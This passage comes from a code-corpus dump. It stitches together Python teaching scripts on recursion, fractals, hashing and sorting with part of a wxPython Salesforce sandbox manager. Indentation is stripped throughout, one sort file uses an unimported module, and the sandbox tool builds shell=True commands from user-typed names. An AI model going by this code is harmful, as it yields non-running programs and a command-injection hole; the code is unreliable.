#the second step is to move the base case from column a to column c
#we are only moving base case, thats why n=1
hanoi(1,a,b,c)
#final step would be move everything above base case from column b to column c
hanoi(n-1,b,a,c)
# In[3]:
hanoi(4,'a','b','c')
# the best explanation should be
# https://www.python-course.eu/towers_of_hanoi.php
```
#### File: je-suis-tm/recursion-and-dynamic-programming/jerusalem cross.py
```python
import matplotlib.pyplot as plt
# In[2]:
#compute euclidean distance
def euclidean_distance(point1,point2):
return ((point1[0]-point2[0])**2+(point1[1]-point2[1])**2)**0.5
# In[3]:
#recursively plot jerusalem cross
#it kinda looks like flag of georgia (n=2)
#i mean the eurasian country not a yankee state
#i call it jerusalem cross but it is aka cross menger square,jerusalem square
#it is a 2d version of jerusalem cube
#a good reference to jerusalem cube
# https://robertdickau.com/jerusalemcube.html
#a good understanding of sierpiński carpet is helpful as well
# https://github.com/je-suis-tm/recursion-and-dynamic-programming/blob/master/sierpi%C5%84ski%20carpet.py
#do not confuse it with quadratic cross,which creates new crosses from the tips
# https://onlinemathtools.com/generate-quadratic-cross-fractal
#or fibonacci snowflakes,which is more like koch snowflake
# http://www.slabbe.org/Publications/2011-fibo-snowflakes.pdf
#or vicsek fractal,which is more similar to crosslet cross
# https://en.wikipedia.org/wiki/Vicsek_fractal
def jerusalem_cross(top_left,top_right,bottom_left,bottom_right,n):
if n<=0:
return
else:
#compute the length
length=euclidean_distance(top_left,top_right)
#create the cross
plt.fill_between(
[top_left[0]+length*(2**0.5-1),top_right[0]-length*(2**0.5-1)],
[bottom_left[1]+length*(2**0.5-1)**2,bottom_left[1]+length*(2**0.5-1)**2],
[top_left[1]-length*(2**0.5-1)**2,top_left[1]-length*(2**0.5-1)**2],
color='k')
plt.fill_between(
[top_left[0]+length*(2**0.5-1)**2,top_right[0]-length*(2**0.5-1)**2],
[bottom_left[1]+length*(2**0.5-1),bottom_left[1]+length*(2**0.5-1)],
[top_left[1]-length*(2**0.5-1),top_left[1]-length*(2**0.5-1)],
color='k')
#top left corner recursion
jerusalem_cross(top_left,(top_left[0]+length*(2**0.5-1),top_left[1]),
(top_left[0],top_left[1]-length*(2**0.5-1)),
(top_left[0]+length*(2**0.5-1),
top_left[1]-length*(2**0.5-1)),n-1)
#top right corner recursion
jerusalem_cross((top_right[0]-length*(2**0.5-1),top_left[1]),top_right,
(top_right[0]-length*(2**0.5-1),
top_left[1]-length*(2**0.5-1)),
(top_right[0],top_left[1]-length*(2**0.5-1)),n-1)
#bottom left corner recursion
jerusalem_cross((bottom_left[0],bottom_left[1]+length*(2**0.5-1)),
(bottom_left[0]+length*(2**0.5-1),
bottom_left[1]+length*(2**0.5-1)),
bottom_left,
(bottom_left[0]+length*(2**0.5-1),bottom_left[1]),n-1)
#bottom right corner recursion
jerusalem_cross((bottom_right[0]-length*(2**0.5-1),
bottom_right[1]+length*(2**0.5-1)),
(bottom_right[0],
bottom_right[1]+length*(2**0.5-1)),
(bottom_right[0]-length*(2**0.5-1),
bottom_right[1]),
bottom_right,n-1)
#top mid corner recursion
jerusalem_cross((top_left[0]+length*(2**0.5-1),top_left[1]),
(top_right[0]-length*(2**0.5-1),top_left[1]),
(top_left[0]+length*(2**0.5-1),
top_left[1]-length*(2**0.5-1)**2),
(top_right[0]-length*(2**0.5-1),
top_left[1]-length*(2**0.5-1)**2),n-2)
#bottom mid corner recursion
jerusalem_cross((bottom_left[0]+length*(2**0.5-1),
bottom_left[1]+length*(2**0.5-1)**2),
(bottom_right[0]-length*(2**0.5-1),
bottom_left[1]+length*(2**0.5-1)**2),
(bottom_left[0]+length*(2**0.5-1),
bottom_left[1]),
(bottom_right[0]-length*(2**0.5-1),
bottom_left[1]),n-2)
#left mid corner recursion
jerusalem_cross((bottom_left[0],
top_left[1]-length*(2**0.5-1)),
(bottom_left[0]+length*(2**0.5-1)**2,
top_left[1]-length*(2**0.5-1)),
(bottom_left[0],bottom_left[1]+length*(2**0.5-1)),
(bottom_left[0]+length*(2**0.5-1)**2,
bottom_left[1]+length*(2**0.5-1)),n-2)
#right mid corner recursion
jerusalem_cross((bottom_right[0]-length*(2**0.5-1)**2,
top_right[1]-length*(2**0.5-1)),
(bottom_right[0],
top_right[1]-length*(2**0.5-1)),
(bottom_right[0]-length*(2**0.5-1)**2,
bottom_right[1]+length*(2**0.5-1)),
(bottom_right[0],bottom_right[1]+length*(2**0.5-1)),
n-2)
# In[4]:
#initialize
top_left=(0,0)
top_right=(1,0)
bottom_left=(0,-1)
bottom_right=(1,-1)
n=5
# In[5]:
#viz
ax=plt.figure(figsize=(10,10))
jerusalem_cross(top_left,top_right,bottom_left,bottom_right,n)
plt.xlim(top_left[0],top_right[0])
plt.ylim(bottom_right[1],top_left[1],)
plt.axis('off')
plt.show()
```
#### File: je-suis-tm/recursion-and-dynamic-programming/koch snowflake.py
```python
import matplotlib.pyplot as plt
# In[2]:
#simple solution to get coefficients of the equation
def get_line_params(x1,y1,x2,y2):
slope=(y1-y2)/(x1-x2)
intercept=y1-slope*x1
return slope,intercept
# In[3]:
#compute euclidean distance
def euclidean_distance(point1,point2):
return ((point1[0]-point2[0])**2+(point1[1]-point2[1])**2)**0.5
# In[4]:
#standard solution to quadratic equation
def solve_quadratic_equation(A,B,C):
x1=(-B+(B**2-4*A*C)**0.5)/(2*A)
x2=(-B-(B**2-4*A*C)**0.5)/(2*A)
return [x1,x2]
# In[5]:
#analytic geometry to compute target datapoints
def get_datapoint(pivot,measure,length,direction='inner'):
#for undefined slope
if pivot[0]==measure[0]:
y1=pivot[1]+length
y2=pivot[1]-length
x1=pivot[0]
x2=pivot[0]
#for general cases
else:
#get line equation
slope,intercept=get_line_params(pivot[0],pivot[1],
measure[0],measure[1],)
#solve quadratic equation
A=1
B=-2*pivot[0]
C=pivot[0]**2-length**2/(slope**2+1)
x1,x2=solve_quadratic_equation(A,B,C)
#get y from line equation
y1=slope*x1+intercept
y2=slope*x2+intercept
if direction=='inner':
#take the one between pivot and measure points
datapoint=min([(x1,y1),(x2,y2)],
key=lambda x:euclidean_distance(x,measure))
else:
#take the one farther away from measure points
datapoint=max([(x1,y1),(x2,y2)],
key=lambda x:euclidean_distance(x,measure))
return datapoint
# In[6]:
#recursively compute the coordinates of koch curve data points
#to effectively connect the data points,the best choice is to use turtle
#it would be too difficult to connect the dots via analytic geometry
def koch_snowflake(base1,base2,base3,n):
#base case
if n==0:
return
else:
#find mid point
#midpoint between base1 and base2 has to satisfy two conditions
#it has to be on the same line as base1 and base2
#assume this line follows y=kx+b
#the midpoint is (x,kx+b)
#base1 is (α,kα+b),base2 is (δ,kδ+b)
#the euclidean distance between midpoint and base1 should be
#half of the euclidean distance between base1 and base2
#(x-α)**2+(kx+b-kα-b)**2=((α-δ)**2+(kα+b-kδ-b)**2)/4
#apart from x,everything else in the equation is constant
#this forms a simple quadratic solution to get two roots
#one root would be between base1 and base2 which yields midpoint
#and the other would be farther away from base2
#this function solves the equation via (-B+(B**2-4*A*C)**0.5)/(2*A)
#alternatively,you can use scipy.optimize.root
#the caveat is it does not offer both roots
#a wrong initial guess could take you to the wrong root
midpoint=get_datapoint(base1,base2,euclidean_distance(base1,base2)/2)
#compute the top point of a triangle
#the computation is similar to midpoint
#the euclidean distance between triangle_top and midpoint should be
#one third of the distance between base3 and midpoint
triangle_top=get_datapoint(midpoint,base3,
euclidean_distance(midpoint,base3)/3,
direction='outer')
#two segment points divide a line into three equal parts
#the computation is almost the same as midpoint
#the euclidean distance between segment1 and base1
#should be one third of the euclidean distance between base2 and base1
segment1=get_datapoint(base1,base2,euclidean_distance(base1,base2)/3)
segment2=get_datapoint(base2,base1,euclidean_distance(base1,base2)/3)
#compute the nearest segment point of the neighboring line
segment_side_1=get_datapoint(base1,base3,euclidean_distance(base1,base3)/3)
segment_side_2=get_datapoint(base2,base3,euclidean_distance(base2,base3)/3)
#recursion
yield [segment1,segment2,triangle_top]
yield from koch_snowflake(base1,segment1,segment_side_1,n-1)
yield from koch_snowflake(segment1,triangle_top,segment2,n-1)
yield from koch_snowflake(triangle_top,segment2,segment1,n-1)
yield from koch_snowflake(segment2,base2,segment_side_2,n-1)
# In[7]:
#set data points
point1=(0,0)
point2=(3,0)
point3=(3/2,3/2*(3**0.5))
#due to python floating point arithmetic
#a lot of data points could go wrong during the calculation
#unfortunately there is no panacea to this malaise
#unless we plan to use decimal package all the time
#when the depth of snowflake reaches 1
#one of the data points reach -1.1102230246251565e-16 on x axis
#when the depth of snowflake reaches 6
#we end up with complex root and things go wrong
n=4
# In[8]:
#collect coordinates
arr=list(koch_snowflake(point1,point2,point3,n))+list(
koch_snowflake(point3,point1,point2,n))+list(
koch_snowflake(point2,point3,point1,n))+[(point1,point2,point3)]
coordinates=[j for i in arr for j in i]
# In[9]:
#viz
#visually u can tell some of the data points are miscalculated
#purely caused by floating point arithmetic
ax=plt.figure(figsize=(5,5))
plt.scatter([i[0] for i in coordinates],
[i[1] for i in coordinates],s=0.5)
plt.axis('off')
plt.show()
# In[10]:
#turtle version of koch snowflake
# https://www.geeksforgeeks.org/koch-curve-koch-snowflake/
```
#### File: je-suis-tm/recursion-and-dynamic-programming/palindrome checker 4 methods.py
```python
import re
def f(n):
#this is the base case, when string is empty
#we just return empty
if n=='':
return n
else:
return n[-1]+f(n[:-1])
def check(n):
#this part is the regular expression to get only characters
#and format all of em into lower cases
c1=re.findall('[a-zA-Z0-9]',n.lower())
c2=re.findall('[a-zA-Z0-9]',(f(n)).lower())
if c1==c2:
return True
else:
return False
#alternatively, we can use deque
#we pop from both sides to see if they are equal
#if not return false
#note that the length of string could be an odd number
#we wanna make sure the pop should take action while length of deque is larger than 1
from collections import deque
def g(n):
c=re.findall('[a-zA-Z0-9]',n.lower())
de=deque(c)
while len(de) >=1:
if de.pop()!=de.popleft():
return False
return True
#or we can use non recursive slicing
def h(n):
c=re.findall('[a-zA-Z0-9]',n.lower())
if c[::-1]==c:
return True
else:
return False
#or creating a new list
#using loop to append new list from old list s popped item
def i(n):
c=re.findall('[a-zA-Z0-9]',n.lower())
d=[]
for i in range(len(c)):
d.append(c.pop())
c=re.findall('[a-zA-Z0-9]',n.lower())
if d==c:
return True
else:
return False
print(check('Evil is a deed as I live!'))
print(g('Evil is a deed as I live!'))
print(h('Evil is a deed as I live!'))
print(i('Evil is a deed as I live!'))
#for time and space complexity, python non recursive slicing wins
```
#### File: je-suis-tm/recursion-and-dynamic-programming/stock trading dynamic programming.py
```python
def stock_trading(prices):
#initialize the profit at zero
profit=[0 for _ in range(len(prices))]
#initialize maximum price with the close price
max_price=prices[-1]
#reverse order iteration
for i in range(len(prices)-2,-1,-1):
#update the maximum price to compute the maximum profit
if prices[i]>max_price:
max_price=prices[i]
#two scenarios to get the maximum profit
#either the previous iteration is larger
#or this round of iteration
profit[i]=max(profit[i+1],max_price-prices[i])
#initialize minimum price with the open price
min_price=prices[0]
#second round of iteration
for i in range(1,len(prices)):
#update the minimum price to compute the maximum profit
if prices[i]<min_price:
min_price=prices[i]
#two scenarios to get the maximum profit
#either the previous iteration is larger
#or this round of iteration plus the result from single transaction
profit[i]=max(profit[i-1],profit[i]+prices[i]-min_price)
return profit[-1]
# In[3]:
stock_trading([10,22,5,75,65,80])
# In[4]:
stock_trading([2,30,15,10,8,25,80])
# In[5]:
stock_trading([100,30,15,10,8,25,80])
# In[6]:
stock_trading([90,70,35,11,5])
```
|
{
"source": "je-suis-tm/search-and-sort",
"score": 4
}
|
#### File: je-suis-tm/search-and-sort/hash search.py
```python
def genr_hash(raw_list):
hashtable={0:'',1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:''}
for i in raw_list:
#check if there is already a value stored under that hash value
#if no, its fine
#if yes, we create a list and append the collision
if hashtable[i%11]=='':
hashtable[i%11]=i
else:
#note that we append both values into the list
temp=[]
temp.append(hashtable[i%11])
temp.append(i)
hashtable[i%11]=temp
return hashtable
#now its the search part
#we just apply hash function on target and get hash value
#we look up the hash value in dictionary
def hashsearch(target,raw_list):
hashtable=genr_hash(raw_list)
temp=hashtable[target%11]
#we gotta check if there is collision under this hash value
#if dictionary keeps a list under this hash value
#we have to further check the list
if type(temp)==list:
if target in temp:
return True
else:
return False
elif temp==target:
return True
else:
return False
# In[2]:
print(hashsearch(55,[21,55,89,67]))
# In[3]:
#linear probing
#when collision occurs, we try to find the next empty slot to store it
#it sounds reasonable but it is also trouble
#what if we run through the whole dictionary
#and there is no slot?
#we can choose to drop the values
#or we can reset the hash function or expand the dictionary
#in the best case, it is faster than chaining
#in the worst case, it is slower
#note that i create a temporary list to append collision items
def genr_hash(raw_list):
hashtable={0:'',1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:''}
temp=[]
badhash=[]
for i in raw_list:
if hashtable[i%11]=='':
hashtable[i%11]=i
else:
temp.append(i)
#the first loop is to make sure every collision will be popped
while len(temp)>0:
pop=temp.pop()
j=pop%11
#c is a counter
#in the second loop
#c is to determine whether we have gone through the entire list
c=0
while c<10:
#when the next one isnt empty, we keep iterating
#when j exceeds ten, we return it to 0
#alternatively we can use mod eleven %11
if hashtable[j]!='':
j+=1
if j>10:
j=0
else:
hashtable[j]=pop
#after the value is assigned
#we clear the value
pop=''
c=10
c+=1
#the reason of checking this temporary variable called pop
#is to make sure that we will print out those items which didnt get assigned
if pop!='':
badhash.append(pop)
pop=''
#if the hashing is imperfect, we print out badhash list
if len(badhash)>0:
print(badhash)
return hashtable
#the search part is very similar to the chaining one
def hashsearch(target,raw_list):
hashtable=genr_hash(raw_list)
temp=target%11
c=0
if hashtable[temp]==target:
return True
else:
#when we cannot find the value at hash value
#we begin our linear probing
#its the same process as the hash function
#except we only need to return T/F
while c<10:
if hashtable[temp]!=target:
temp+=1
if temp>10:
temp=0
else:
return True
c+=1
return False
# In[4]:
print(hashsearch(67,[21,55,89,67,12,12]))
# In[5]:
#quadratic probing
#it sounds math intensive with the word quadratic
#as a matter of fact, it is simple AF
#we just replace the add one method with add quadratic values
#the difference is that we need an extra variable to store quadratic value
def genr_hash(raw_list):
hashtable={0:'',1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:''}
temp=[]
badhash=[]
for i in raw_list:
if hashtable[i%11]=='':
hashtable[i%11]=i
else:
temp.append(i)
while len(temp)>0:
pop=temp.pop()
j=pop%11
c=0
#x is where we store quadratic value
x=1
while c<10:
if hashtable[j]!='':
#the loop is basically the same as linear probing
#except we add quadratic value
#note that its quite difficult
#to determine whether we have been through the entire list
#so i still set counter limit at 10
j+=x**2
if j>10:
#note that i use mod eleven %11 when iteration exceeds hash table size
j=j%11
else:
hashtable[j]=pop
pop=''
c=10
c+=1
x+=1
if pop!='':
badhash.append(pop)
pop=''
if len(badhash)>0:
print(badhash)
return hashtable
#the search is basically the same as linear probing
#except linear part is substituted with quadratic
def hashsearch(target,raw_list):
hashtable=genr_hash(raw_list)
temp=target%11
c=0
x=1
if hashtable[temp]==target:
return True
else:
while c<10:
if hashtable[temp]!=target:
temp+=x**2
if temp>10:
temp=temp%11
else:
return True
c+=1
x+=1
return False
# In[6]:
print(hashsearch(67,[21,55,89,67,12,12,12,12,12,12,12,12,12,12,78]))
#we get False in the end
#its quite interesting that for the same hash value 67,12,78
#we can store 78 in hash table but not 67
#because we use pop function
#the list is processed in a reversed order
#78 and 12 are processed earlier than 67
#quadratic probing doesnt iterate through all slots
#all empty slots we can iterate have been occupied by the time we reach 67
```
#### File: je-suis-tm/search-and-sort/quick sort.py
```python
import random as rd
#okay. the epic one!
#quick sort, mmm, not so quick
#the idea of quick sort is be the quickest
#first thing first, we gotta pick a pivot number for the list
#normally, people use the first element as pivot number
#however, we may encounter a case that the first element is the largest or the smallest
#that would make our sorting a total failure
#here i use the median of 3 approach
#take the first, the last and the one in the middle
#and get the median of the three
#we use the median as a pivot number
#after that, we do the same trick as merge sort
#we have a left index and a right index
#we do traversal on both indices
#say the left index comes from the left part
#the right index comes from the right part
#we compare two elements with pivot number at the same time
#there are four cases assuming that we dont have any duplicate values in the list
#first case, left is larger than pivot, right is smaller than pivot
#so we swap both
#second case, left is larger than pivot, right is larger than pivot as well
#we freeze the left, and move right side index one step backwards
#right=right-1
#then if left is larger than pivot, right is smaller than pivot
#we back to the first case
#if it is still the second case, we repeat this procedure until we move to first case
#or left and right indices cross, we stop the sorting
#third case, left is smaller than pivot, right is smaller than pivot
#it is the opposite case of the second case
#fourth case, left is smaller than pivot, right is larger than pivot
#great, we do nothing but moving both indices closer to the centre
#these are four basic scenarios when we do both traversals
#when left and right indices cross, we stop the sorting
#and we insert the pivot number in where indices cross
#the next step is just like merge sort
#we divide the list in two halves (excluding the pivot number)
#we perform the same trick on both halves recursively
#until we reach the base case when there are only two elements in the list
#we sort those two elements with simple comparison
def quick_sort(target):
#the first step is to get a pivot number
#it only works on list with more than two elements
#otherwise there is no point of getting a pivot number
if len(target)>2:
#we take three elements, first, last and middle
#we get a new list
test=[target[0],target[len(target)//2],target[-1]]
#this is how we get the median
#there are only 3 elements
#so the sum of indices is 3
#0+1+2
#all we need to do is to exclude the maximum and the minimum indices
#we get the median s index
pivotindex=3-test.index(max(test))-test.index(min(test))
#this part is very confusing
#mostly due to simultaneous swap
#it is merely swapping
#if the median number index is 0
#we do nothing
#cuz we initialize pivot number at index 0 later
#if not
#we make a swap
#we use slicing method to get the index of the median in original list
#we use that index to get the actual element
#then we swap it with element 0
if pivotindex!=0:
target[target.index(test[pivotindex])] , target[0] = target[0] , target[target.index(test[pivotindex])]
#with the previous swap, we initialize pivot number at position 0
pivot=target[0]
#first index is at 1, cuz we wanna exclude pivot number
left=1
#last index is at the end of the list
right=len(target)-1
#here comes the real deal
#when left and right dont cross
#excluding a case when two indices equal to each other
while left-1<right:
#case 1
if target[left]>pivot and target[right]<pivot:
target[left],target[right]=target[right],target[left]
left-=1
#case 3
if target[left]<pivot and target[right]<pivot:
left+=1
#case 2
if target[left]>pivot and target[right]>pivot:
right-=1
#case 4
if target[left]<pivot and target[right]>pivot:
left+=1
right-=1
#when left and right indices cross
#we pop the pivot number and insert it at position left-1
#when indices cross, we are one step after the input list is sorted
#therefore, we insert pivot at left-1 instead of left
if left>=right:
target.insert(left-1,target.pop(0))
#the recursive part
#we do the same trick on two halves
target[:left-1]=quick_sort(target[:left-1])
target[left:]=quick_sort(target[left:])
#the base case
#when we are left with two elements in a sublist
#we just compare and return in reverse order
#u might ask, what about one element
#well, we dont have to do anything so no codes needed
if len(target)==2:
if target[0]>target[1]:
return target[::-1]
return target
#there is a constraint for quick sort
#duplicate values would jeopardize everything we have built
#to solve that issue, we must amend the criteria for selecting pivot number
#for simplicity, i remove duplicates from our test list
#to handle duplicate values which might affect pivot
#my idea is to insert an extra if function
#if elements not at position 0 equal to pivot
#we create a temporary list to collect them
#when we plan to insert pivot
#we insert the temporary list to the full list
#since we have recursive functions
#this approach to get a quick sort
#is kinda different from my textbook
#to see the alternative version
#plz click the link below
# http://interactivepython.org/runestone/static/pythonds/SortSearch/TheQuickSort.html
for i in range(100):
target=rd.sample([i for i in range(1000)],100)
if quick_sort(target)!=sorted(target):
print('Erreur')
```
#### File: je-suis-tm/search-and-sort/shaker sort.py
```python
import random as rd
# In[2]:
#shaker sort, or cocktail sort, or cocktail shaker sort
#in this script, we will call it cocktail shaker sort
#with so many names, it is merely a variation of bubble sort
#go the link below to check out the details of bubble sort
# https://github.com/je-suis-tm/search-and-sort/blob/master/bubble,%20selection%20and%20insertion%20sort.py
#bubble sort repeatedly takes comparison from one side to the other
#usually left to right, takes n*(n-1) steps, assuming n is the size
#cocktail shaker sort has a similar mechanism
#except it compares its elements from left to right
#then right to left, later left to right
#the process looks like a cocktail shaker (not really)
#that is how the sort gets its name
#in theory, for a partially sorted list
#cocktail shaker sort takes less time than a bubble sort
def cocktail_shaker_sort(target):
#we use left and right to define each round's start and end point
left=0
right=len(target)-1
swap=True
while left<right or not swap:
swap=False
#as usual, we start from left to right
for i in range(left+1,right+1):
if target[i]<target[i-1]:
target[i],target[i-1]=target[i-1],target[i]
swap=True
right-=1
#swap is the key to increase the efficiency
#once there is no swap happened in the loop
#we can conclude the target list is fully sorted
if not swap:
return target
swap=False
#then right to left
for j in range(right,left,-1):
if target[j]<target[j-1]:
target[j],target[j-1]=target[j-1],target[j]
swap=True
left+=1
return target
# In[3]:
for i in range(100):
target=rd.sample([i for i in range(1000)],100)
if cocktail_shaker_sort(target)!=sorted(target):
print('Erreur')
```
#### File: je-suis-tm/search-and-sort/shell sort.py
```python
def insertion_sort(target):
for i in range(1,len(target)):
val=target[i]
j=i
while val<target[j-1] and j!=0:
target[j]=target[j-1]
j-=1
target[j]=val
return target
#shell sort is a variation of insertion sort
#slicing method [a::b] is the key
#we gotta cut the original list into a few small groups
#assume we have a list of n elements
#the first step, we do b=n//a, we get a few sublists by [a::b]
#we apply insertion sort on those sublists and concatenate
#next, we do b=b//a, and we obtain a few new sublists by [a::b]
#we apply insertion sort on new sublists and concatenate
#we keep using //a method and do insertion sort and concatenate
#til b reaches zero
#we concatenate sublists and do a final insertion sort
#we shall end up with a sorted list
#the time complexity is quite difficult to calculate
def shell_sort(target):
#the first step is to initialize a
#we will use this variable to divide the list and do slicing
#in this case, i equals to 4, you can change the default number to any digit
#bear in mind that this variable keeps the size of each sublist reasonable
#we keep b divided by 4 until it reaches zero
a=4
b=len(target)//a
while b>0:
#instead of rebuilding the wheel
#i directly call it in shell sort
for i in range(b):
temp=insertion_sort(target[i::b])
#put the sorted sublist back to a bigger list
for j in range(len(temp)):
target[i+j*b]=temp[j]
b=b//a
return insertion_sort(target)
for i in range(100):
target=rd.sample([i for i in range(1000)],100)
if shell_sort(target)!=sorted(target):
print('Erreur')
```
|
{
"source": "jesuRule/dtk",
"score": 2
}
|
#### File: dtk/src/dtkorg.py
```python
import os
import platform
import subprocess
import threading
import dtkglobal
import wx
class AddSandboxPanel(wx.Panel):
def __init__(self, parent):
super(AddSandboxPanel, self).__init__(parent)
self.InitUI()
def InitUI(self):
self.mainSizer = wx.GridBagSizer(5, 5)
self.organizationLbl = wx.StaticText(self, label="Organization")
self.organizationLbl.ToolTip = "List of Organizations available."
self.organizationComboBox = wx.ComboBox(self, style=wx.CB_READONLY)
self.organizationComboBox.ToolTip = "List of Organizations available."
self.organizationComboBox.Items = dtkglobal.orgList
self.sandboxTypeLbl = wx.StaticText(self, label="Sandbox Type")
self.sandboxTypeLbl.ToolTip = "Sandbox Type: Config, QA, UAT or Prod."
self.sandboxTypeComboBox = wx.ComboBox(self, style=wx.CB_READONLY)
self.sandboxTypeComboBox.ToolTip = "Sandbox Type: Config, QA, UAT or Prod."
self.sandboxTypeComboBox.Items = dtkglobal.defaultSandboxTypes
if dtkglobal.advSetting:
self.sandboxOverrideLbl = wx.StaticText(self, label="Sandbox Override Name")
self.sandboxOverrideLbl.ToolTip = "The sandbox name set here will be added instead of the Sandbox Type."
self.sandboxOverrideTextCtrl = wx.TextCtrl(self)
self.sandboxOverrideTextCtrl.ToolTip = (
"The sandbox name set here will be added instead of the Sandbox Type."
)
self.btnShowSfdxAliasList = wx.Button(self, label="Show SFDX Alias List")
self.btnShowSfdxAliasList.Bind(wx.EVT_BUTTON, self.ShowSfdxAliasList)
self.btnAddSandbox = wx.Button(self, label="Add Sandbox")
self.btnAddSandbox.Bind(wx.EVT_BUTTON, self.AddSandboxButton)
self.consoleOutputLbl = wx.StaticText(self, label="Log")
self.consoleOutputLbl.ToolTip = "Console output log."
self.consoleOutputTextCtrl = wx.TextCtrl(
self, style=wx.TE_MULTILINE | wx.TE_READONLY | wx.TE_AUTO_URL | wx.HSCROLL
)
self.consoleOutputTextCtrl.ToolTip = "Console output log."
row = 0
col = 0
spanV = 0
spanH = 15
self.mainSizer.Add(self.organizationLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.organizationComboBox,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.sandboxTypeLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.sandboxTypeComboBox,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
if dtkglobal.advSetting:
self.mainSizer.Add(
self.sandboxOverrideLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
self.mainSizer.Add(
self.sandboxOverrideTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.btnShowSfdxAliasList, pos=(row, 0), flag=wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.btnAddSandbox, pos=(row, col + 15), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
row += 1
self.mainSizer.Add(
self.consoleOutputLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
row += 1
self.mainSizer.Add(
self.consoleOutputTextCtrl,
pos=(row, col),
span=(spanV + 10, spanH + 1),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
self.mainSizer.AddGrowableCol(2)
self.mainSizer.AddGrowableRow(row)
self.mainSizer.SetEmptyCellSize((0, 0))
self.Layout()
self.Fit()
self.SetSizer(self.mainSizer)
def ShowSfdxAliasList(self, event):
cmd = ["sfdx", "force:alias:list"]
if (platform.system() != "Windows"):
cmd = ["/usr/local/bin/sfdx" + " " + "force:alias:list"]
proc = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE
)
self.consoleOutputTextCtrl.AppendText(proc.stdout.read())
self.consoleOutputTextCtrl.AppendText(os.linesep)
def AddSandboxButton(self, event):
self.consoleOutputTextCtrl.Clear()
orgName = self.organizationComboBox.GetValue()
sdbxName = self.sandboxTypeComboBox.GetValue()
if dtkglobal.advSetting:
sandboxOverride = self.sandboxOverrideTextCtrl.GetValue()
if len(sandboxOverride) > 0:
sdbxName = sandboxOverride
if len(orgName) == 0:
dlg = wx.MessageDialog(self, "Please select an organization.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if len(sdbxName) == 0:
dlg = wx.MessageDialog(self, "Please select a sandbox.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
sdbxName = sdbxName.rstrip()
sdbxName = sdbxName.replace(" ", "_")
sandboxName = orgName + "_" + sdbxName
if sdbxName in dtkglobal.orgDict[orgName]["sandboxes"]:
dlg = wx.MessageDialog(
self,
"The sandbox '"
+ sdbxName
+ "' already exist for organization '"
+ orgName
+ "', please choose another sandbox.",
"DTK - Add Sandbox",
wx.OK | wx.ICON_ERROR,
)
dlg.ShowModal()
dlg.Destroy()
else:
if sdbxName == "Prod":
serverUrl = "https://login.salesforce.com"
else:
serverUrl = "https://test.salesforce.com"
self.consoleOutputTextCtrl.AppendText(
"Adding sandbox '" + sdbxName + "' for organization '" + orgName + "'."
)
self.consoleOutputTextCtrl.AppendText(os.linesep)
self.consoleOutputTextCtrl.AppendText("This needs an online login on the browser to complete the addition.")
self.consoleOutputTextCtrl.AppendText(os.linesep)
self.consoleOutputTextCtrl.AppendText(
"If the browser is closed without doing the login the sandbox won't be added."
)
self.consoleOutputTextCtrl.AppendText(os.linesep)
thread = threading.Thread(target=self.RunAddSandbox, args=(orgName, sdbxName, sandboxName, serverUrl))
thread.setDaemon(True)
thread.start()
def OnText(self, text):
self.consoleOutputTextCtrl.AppendText(text)
def RunAddSandbox(self, orgName, sdbxName, sandboxName, serverUrl):
cmd = ["sfdx", "force:auth:web:login", "-a", sandboxName, "-r", serverUrl]
if (platform.system() != "Windows"):
cmd = ["/usr/local/bin/sfdx" + " " + "force:auth:web:login" + " " + "-a" + " " + sandboxName + " " + "-r" + " " + serverUrl]
proc = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE
)
for line in proc.stdout:
wx.CallAfter(self.OnText, line)
dtkglobal.orgDict[orgName]["sandboxes"].append(sdbxName)
dtkglobal.StoreOrgs()
dtkglobal.ReadOrgs()
sandboxList = dtkglobal.orgDict[orgName]["sandboxes"]
sandboxList.sort()
self.Parent.GetPage(0).sandboxesListBox.Items = sandboxList
class ManageSandboxPanel(wx.Panel):
def __init__(self, parent):
super(ManageSandboxPanel, self).__init__(parent)
self.InitUI()
def InitUI(self):
self.mainSizer = wx.GridBagSizer(1, 1)
self.organizationLbl = wx.StaticText(self, label="Organization")
self.organizationLbl.ToolTip = "List of Organizations available."
self.organizationComboBox = wx.ComboBox(self, style=wx.CB_READONLY)
self.organizationComboBox.ToolTip = "List of Organizations available."
self.organizationComboBox.Items = dtkglobal.orgList
self.organizationComboBox.Bind(wx.EVT_COMBOBOX, self.OrganizationSelected)
self.sandboxesLbl = wx.StaticText(self, label="Sandboxes")
self.sandboxesLbl.ToolTip = "List of Sandboxes available."
self.sandboxesListBox = wx.ListBox(self)
self.sandboxesListBox.ToolTip = "List of Sandboxes available."
self.btnOpenSandbox = wx.Button(self, label="Open")
self.btnOpenSandbox.Bind(wx.EVT_BUTTON, self.OpenSandboxButton)
self.btnDeleteSandbox = wx.Button(self, label="Delete Sandbox")
self.btnDeleteSandbox.Bind(wx.EVT_BUTTON, self.DeleteSandboxButton)
row = 0
col = 0
